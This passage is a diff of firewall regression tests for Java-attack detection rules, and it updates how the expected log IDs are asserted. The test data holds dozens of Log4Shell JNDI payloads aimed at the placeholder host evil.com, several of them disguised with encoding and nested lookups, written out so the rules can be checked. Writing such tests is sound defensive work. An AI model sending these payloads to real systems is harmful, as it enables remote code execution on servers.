@@ -7461,7 +7847,8 @@ tests: version: "HTTP/1.0" data: "javax.script.ScriptEngineManager=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 388 desc: "Cookie test includes keyword javax.script.ScriptEngineManager" stages: @@ -7481,7 +7868,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 389 desc: "Cookie name includes keyword javax.script.ScriptEngineManager" stages: @@ -7501,7 +7889,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 390 desc: "Request header test includes keyword javax.script.ScriptEngineManager" stages: @@ -7521,7 +7910,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 391 desc: "XML attribute value includes keyword javax.script.ScriptEngineManager" stages: @@ -7540,7 +7930,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 392 desc: "XML element value includes keyword javax.script.ScriptEngineManager" stages: @@ -7559,7 +7950,8 @@ tests: version: "HTTP/1.0" data: "javax.script.ScriptEngineManager" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 393 desc: "Nested XML element value includes keyword javax.script.ScriptEngineManager" stages: @@ -7578,7 +7970,8 @@ tests: version: "HTTP/1.0" data: "javax.script.ScriptEngineManager" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 394 desc: "Content-Type text/plain includes keyword javax.script.ScriptEngineManager" stages: @@ -7597,7 +7990,8 @@ tests: version: "HTTP/1.0" data: "test=javax.script.ScriptEngineManager" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 395 desc: "Content-Type application/json arg value includes keyword javax.script.ScriptEngineManager" stages: @@ -7616,7 +8010,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"javax.script.ScriptEngineManager\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 396 desc: "Content-Type application/json arg name includes keyword javax.script.ScriptEngineManager" stages: @@ -7635,7 +8030,8 @@ tests: version: "HTTP/1.0" data: "{\"javax.script.ScriptEngineManager\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 397 desc: "Argument test includes keyword org.apache.commons" stages: @@ -7654,7 +8050,8 @@ tests: version: "HTTP/1.0" data: "test=org.apache.commons" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 398 desc: "Argument name includes keyword org.apache.commons" stages: @@ -7673,7 +8070,8 @@ tests: version: "HTTP/1.0" data: "org.apache.commons=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 399 desc: "Cookie test includes keyword org.apache.commons" stages: @@ -7693,7 +8091,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 400 desc: "Cookie name includes keyword org.apache.commons" stages: @@ -7713,7 +8112,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 401 desc: "Request header test includes keyword org.apache.commons" stages: @@ -7733,7 +8133,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 402 desc: "XML attribute value includes keyword org.apache.commons" stages: @@ -7752,7 +8153,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 403 desc: "XML element value includes keyword org.apache.commons" stages: @@ -7771,7 +8173,8 @@ tests: version: "HTTP/1.0" data: "org.apache.commons" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 404 desc: "Nested XML element value includes keyword org.apache.commons" stages: @@ -7790,7 +8193,8 @@ tests: version: "HTTP/1.0" data: "org.apache.commons" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 405 desc: "Content-Type text/plain includes keyword org.apache.commons" stages: @@ -7809,7 +8213,8 @@ tests: version: "HTTP/1.0" data: "test=org.apache.commons" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 406 desc: "Content-Type application/json arg value includes keyword org.apache.commons" stages: @@ -7828,7 +8233,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"org.apache.commons\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 407 desc: "Content-Type application/json arg name includes keyword org.apache.commons" stages: @@ -7847,7 +8253,8 @@ tests: version: "HTTP/1.0" data: "{\"org.apache.commons\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 408 desc: "Argument test includes keyword org.omg.CORBA" stages: @@ -7866,7 +8273,8 @@ tests: version: "HTTP/1.0" data: "test=org.omg.CORBA" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 409 desc: "Argument name includes keyword org.omg.CORBA" stages: @@ -7885,7 +8293,8 @@ tests: version: "HTTP/1.0" data: "org.omg.CORBA=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 410 desc: "Cookie test includes keyword org.omg.CORBA" stages: @@ -7905,7 +8314,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 411 desc: "Cookie name includes keyword org.omg.CORBA" stages: @@ -7925,7 +8335,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 412 desc: "Request header test includes keyword org.omg.CORBA" stages: @@ -7945,7 +8356,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 413 desc: "XML attribute value includes keyword org.omg.CORBA" stages: @@ -7964,7 +8376,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 414 desc: "XML element value includes keyword org.omg.CORBA" stages: @@ -7983,7 +8396,8 @@ tests: version: "HTTP/1.0" data: "org.omg.CORBA" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 415 desc: "Nested XML element value includes keyword org.omg.CORBA" stages: @@ -8002,7 +8416,8 @@ tests: version: "HTTP/1.0" data: "org.omg.CORBA" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 416 desc: "Content-Type text/plain includes keyword org.omg.CORBA" stages: @@ -8021,7 +8436,8 @@ tests: version: "HTTP/1.0" data: "test=org.omg.CORBA" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 417 desc: "Content-Type application/json arg value includes keyword org.omg.CORBA" stages: @@ -8040,7 +8456,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"org.omg.CORBA\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 418 desc: "Content-Type application/json arg name includes keyword org.omg.CORBA" stages: @@ -8059,4 +8476,5 @@ tests: version: "HTTP/1.0" data: "{\"org.omg.CORBA\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml index e53d52a3d..56e884e21 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml @@ -17,7 +17,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: id "944140" + log: + no_expect_ids: [944140] - test_id: 2 desc: Java script uploads stages: @@ -33,7 +34,8 @@ tests: uri: "/get/upload1" version: "HTTP/1.1" output: - log_contains: id "944140" + log: + expect_ids: [944140] - test_id: 3 desc: Java script uploads stages: @@ -49,7 +51,8 @@ tests: uri: "/get/upload2" version: "HTTP/1.1" output: - log_contains: id "944140" + log: + expect_ids: [944140] - test_id: 4 desc: Java script uploads stages: @@ -65,7 +68,8 @@ tests: uri: "/get/upload3" version: "HTTP/1.1" output: - log_contains: id "944140" + log: + expect_ids: [944140] - test_id: 5 desc: Java script uploads stages: @@ -81,7 +85,8 @@ tests: uri: "/get/upload4" version: "HTTP/1.1" output: - log_contains: id "944140" + log: + expect_ids: [944140] - test_id: 6 desc: Java script uploads stages: @@ -97,7 +102,8 @@ tests: uri: "/get/upload" version: "HTTP/1.1" output: - log_contains: id "944140" + log: + expect_ids: [944140] - test_id: 7 desc: Java script uploads stages: @@ -113,7 +119,8 @@ tests: uri: "/get/upload" version: "HTTP/1.1" output: - log_contains: id "944140" + log: + expect_ids: [944140] - test_id: 8 desc: Java script uploads stages: @@ -129,7 +136,8 @@ tests: uri: "/get/upload7" version: "HTTP/1.1" output: - log_contains: id "944140" + log: + expect_ids: [944140] - test_id: 9 desc: Java script uploads stages: @@ -145,4 +153,5 @@ tests: uri: "/get/upload8" version: "HTTP/1.1" output: - no_log_contains: id "944140" + log: + no_expect_ids: [944140] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml index 1042f5a4e..4f7e39fdd 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml @@ -3,7 +3,6 @@ # 944151 should detect the same things as 944150. meta: author: "dune73, Max Leske, azurit" - description: "Description" rule_id: 944150 tests: - test_id: 1 @@ -22,7 +21,8 @@ tests: data: foo=${jndi:ldap://evil.com/webshell} version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 2 desc: Log4J exploit on User-Agent stages: @@ -37,7 +37,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 3 desc: Log4J exploit in XML code stages: @@ -54,7 +55,8 @@ tests: data: version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 4 desc: Log4J exploit in XML code stages: @@ -71,7 +73,8 @@ tests: data: "${jndi:ldap://evil.com/webshell}" version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 5 desc: Log4J exploit on arg foo, with evasion stages: @@ -88,7 +91,8 @@ tests: data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 6 desc: Log4J exploit on arg foo, with evasion stages: @@ -105,7 +109,8 @@ tests: data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 7 desc: Log4J exploit on arg foo, with evasion stages: @@ -122,7 +127,8 @@ tests: data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 8 desc: Log4J exploit on arg foo, with Unicode escape encoding evasion stages: @@ -139,7 +145,8 @@ tests: data: foo=$\u007Bjndi:ldap://evil.com/webshell} version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 9 desc: Log4J exploit on JSON with URL encoding evasion stages: @@ -156,7 +163,8 @@ tests: data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 10 desc: Log4J exploit on JSON with Unicode escape evasion, uppercase stages: @@ -173,7 +181,8 @@ tests: data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 11 desc: Log4J exploit on JSON with Unicode escape evasion, lowercase stages: @@ -190,7 +199,8 @@ tests: data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 12 desc: Log4J exploit on JSON with named HTML entity evasion, lower case stages: @@ -207,7 +217,8 @@ tests: data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 13 desc: Log4J exploit on JSON with named HTML entity evasion, upper case stages: @@ -224,7 +235,8 @@ tests: data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 14 desc: Log4J exploit on JSON with numeric HTML entity evasion stages: @@ -241,7 +253,8 @@ tests: data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 15 desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion stages: @@ -258,7 +271,8 @@ tests: data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 16 desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion stages: @@ -275,7 +289,8 @@ tests: data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 17 desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion stages: @@ -292,7 +307,8 @@ tests: data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 18 desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion stages: @@ -309,7 +325,8 @@ tests: data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 19 desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion stages: @@ -326,7 +343,8 @@ tests: data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 20 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion stages: @@ -343,7 +361,8 @@ tests: data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 21 desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion stages: @@ -360,7 +379,8 @@ tests: data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 22 desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion stages: @@ -377,7 +397,8 @@ tests: data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 23 desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 stages: @@ -393,7 +414,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 24 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon stages: @@ -410,4 +432,5 @@ tests: data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml index 9a57d7419..1c15911e4 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml @@ -3,7 +3,6 @@ # 944151 should detect the same things as 944151. meta: author: "dune73, Max Leske, azurit" - description: "Description" rule_id: 944151 tests: - test_id: 1 @@ -22,7 +21,8 @@ tests: data: foo=${jndi:ldap://evil.com/webshell} version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 2 desc: Log4J exploit on User-Agent stages: @@ -37,7 +37,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 3 desc: Log4J exploit in XML code stages: @@ -54,7 +55,8 @@ tests: data: version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 4 desc: Log4J exploit in XML code stages: @@ -71,7 +73,8 @@ tests: data: "${jndi:ldap://evil.com/webshell}" version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 5 desc: Log4J exploit on arg foo, with evasion stages: @@ -88,7 +91,8 @@ tests: data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 6 desc: Log4J exploit on arg foo, with evasion stages: @@ -105,7 +109,8 @@ tests: data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 7 desc: Log4J exploit on arg foo, with evasion stages: @@ -122,7 +127,8 @@ tests: data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 8 desc: Log4J exploit on arg foo, with Unicode escape encoding evasion stages: @@ -139,7 +145,8 @@ tests: data: foo=$\u007Bjndi:ldap://evil.com/webshell} version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 9 desc: Log4J exploit on JSON with URL encoding evasion stages: @@ -156,7 +163,8 @@ tests: data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 10 desc: Log4J exploit on JSON with Unicode escape evasion, uppercase stages: @@ -173,7 +181,8 @@ tests: data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 11 desc: Log4J exploit on JSON with Unicode escape evasion, lowercase stages: @@ -190,7 +199,8 @@ tests: data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 12 desc: Log4J exploit on JSON with named HTML entity evasion, lower case stages: @@ -207,7 +217,8 @@ tests: data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 13 desc: Log4J exploit on JSON with named HTML entity evasion, upper case stages: @@ -224,7 +235,8 @@ tests: data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 14 desc: Log4J exploit on JSON with numeric HTML entity evasion stages: @@ -241,7 +253,8 @@ tests: data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 15 desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion stages: @@ -258,7 +271,8 @@ tests: data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 16 desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion stages: @@ -275,7 +289,8 @@ tests: data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 17 desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion stages: @@ -292,7 +307,8 @@ tests: data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 18 desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion stages: @@ -309,7 +325,8 @@ tests: data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 19 desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion stages: @@ -326,7 +343,8 @@ tests: data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 20 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion stages: @@ -343,7 +361,8 @@ tests: data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 21 desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion stages: @@ -360,7 +379,8 @@ tests: data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 22 desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion stages: @@ -377,7 +397,8 @@ tests: data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 23 desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 stages: @@ -393,7 +414,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 24 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon stages: @@ -410,7 +432,8 @@ tests: data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 25 desc: Log4J exploit on arg foo, with evasion stages: @@ -427,4 +450,5 @@ tests: data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml index 17d937eef..4621656e8 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml @@ -3,7 +3,6 @@ # 944152 should detect the same things as 944152 and 944151. meta: author: "dune73, Max Leske, azurit" - description: "Description" rule_id: 944152 tests: - test_id: 1 @@ -22,7 +21,8 @@ tests: data: foo=${jndi:ldap://evil.com/webshell} version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 2 desc: Log4J exploit on User-Agent stages: @@ -37,7 +37,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 3 desc: Log4J exploit in XML code stages: @@ -54,7 +55,8 @@ tests: data: version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 4 desc: Log4J exploit in XML code stages: @@ -71,7 +73,8 @@ tests: data: "${jndi:ldap://evil.com/webshell}" version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 5 desc: Log4J exploit on arg foo, with evasion stages: @@ -88,7 +91,8 @@ tests: data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 6 desc: Log4J exploit on arg foo, with evasion stages: @@ -105,7 +109,8 @@ tests: data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 7 desc: Log4J exploit on arg foo, with evasion stages: @@ -122,7 +127,8 @@ tests: data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 8 desc: Log4J exploit on arg foo, with Unicode escape encoding evasion stages: @@ -139,7 +145,8 @@ tests: data: foo=$\u007Bjndi:ldap://evil.com/webshell} version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 9 desc: Log4J exploit on JSON with URL encoding evasion stages: @@ -156,7 +163,8 @@ tests: data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 10 desc: Log4J exploit on JSON with Unicode escape evasion, uppercase stages: @@ -173,7 +181,8 @@ tests: data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 11 desc: Log4J exploit on JSON with Unicode escape evasion, lowercase stages: @@ -190,7 +199,8 @@ tests: data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 12 desc: Log4J exploit on JSON with named HTML entity evasion, lower case stages: @@ -207,7 +217,8 @@ tests: data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 13 desc: Log4J exploit on JSON with named HTML entity evasion, upper case stages: @@ -224,7 +235,8 @@ tests: data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 14 desc: Log4J exploit on JSON with numeric HTML entity evasion stages: @@ -241,7 +253,8 @@ tests: data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 15 desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion stages: @@ -258,7 +271,8 @@ tests: data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 16 desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion stages: @@ -275,7 +289,8 @@ tests: data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 17 desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion stages: @@ -292,7 +307,8 @@ tests: data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 18 desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion stages: @@ -309,7 +325,8 @@ tests: data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 19 desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion stages: @@ -326,7 +343,8 @@ tests: data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 20 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion stages: @@ -343,7 +361,8 @@ tests: data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 21 desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion stages: @@ -360,7 +379,8 @@ tests: data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 22 desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion stages: @@ -377,7 +397,8 @@ tests: data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 23 desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 stages: @@ -393,7 +414,8 @@ tests: uri: 